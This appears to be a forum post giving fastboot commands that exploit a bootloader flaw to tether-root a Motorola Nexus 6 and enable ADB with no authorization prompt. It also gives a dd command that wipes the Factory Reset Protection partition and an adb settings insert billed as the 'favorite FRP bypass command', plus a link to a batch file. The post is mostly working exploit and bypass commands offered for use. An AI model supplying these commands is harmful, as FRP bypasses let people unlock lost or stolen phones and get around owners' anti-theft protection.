Hi, use below commands on fastboot mode to tethered ROOT Motorola Nexus 6(shamu).
These commands will also enable ADB (Yes, will NOT ask authorization).
So, we can either wipe “frp” partition with “adb shell” and “dd” or we can load favorite FRP bypass command:
ROOT and Enable ADB on Nexus 6 via fastboot mode:
| First root/enable ADB command:
fastboot oem config fsg-id “a initrd=0x11000000,1519997” Second command, only if first one fails: fastboot oem config fsg-id “a initrd=0x11000000,1518172” |
FRP partition wipe command:
dd if=/dev/zero of=/dev/block/mmcblk0p18
This block p18 is FRP partition in Nexus 6 (shamu).
Our favorite FRP bypass command:
adb shell content insert --uri content://settings/secure --bind name:s:user_setup_complete --bind value:s:1
Since this is tethered root, phone will boot loop after every restart and we have to send root command
again in order phone to work again or we can just unroot the device with this command:
fastboot oem config fsg-id "" fastboot reboot
All credit goes to: @roeehay – exploit, intiramfs, padding all by him.
Roee Hay (@roeehay) of Aleph Research, HCL Technologies
I did NOTHING in fact. I just put all this here because people were selling others’ work 
Here is a video demonstration of successfully tethered root Nexus 6, Video by aleph security:
Here is a batch to make things easy:
https://mega.nz/#!cBwCBbCY!grH6T-xQq…dKEEMX56bP3dDg
PS: This will NOT work on newest security patch, if anything goes wrong,
you can always restore to initial state by sending simple “unroot fastboot command” I posted above.
If you have security patch older than April and if this is not working.
You can flash it to 7.1.1 (N6F26Y, Apr 2017) or 7.1.1 (N6F26U, Mar 2017)
https://youtu.be/1uhfic8qj2w
